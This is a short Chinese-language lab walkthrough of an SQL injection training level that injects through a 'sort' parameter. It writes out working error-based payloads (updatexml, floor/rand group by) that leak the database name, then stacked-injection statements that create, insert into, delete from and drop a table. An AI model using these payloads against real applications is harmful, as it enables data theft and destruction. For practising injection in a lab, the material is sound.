这一关仍然是以sort作为注入点的

首先我们输入rand() 判断是数字型还是字符型

多次尝试 发生变化 说明属于数字型

接着试试报错注入 输入以下语句

sort=updatexml(1,if(1=1,concat(0x7e,database(),0x7e),1),1)--+

存在回显 说明可以使用报错注入哦

这一关要训练的是堆叠注入哦

我们这一关试试新的报错注入方式 输入如下

sort=(select count(*) from information_schema.tables group by concat(floor(rand(0)*2),database()));--+

 也可以哦

那么以上的爆破操作就告一段落了

然后就是堆叠注入了

输入如下(创建一个表格)

sort=1;create table demo like users;--+

 回显如下

 

接着进行添加数据操作 输入如下

sort=1;insert into demo values(1,'xiaocai','999')--+

 回显如下

 

接着进行删除数据的操作 输入如下

sort=1;delete from demo where id=1;--+

 回显如下

 

最后进行删除表格操作 输入如下

sort=1;drop table demo;--+

 回显如下

 

成功嗨嗨！！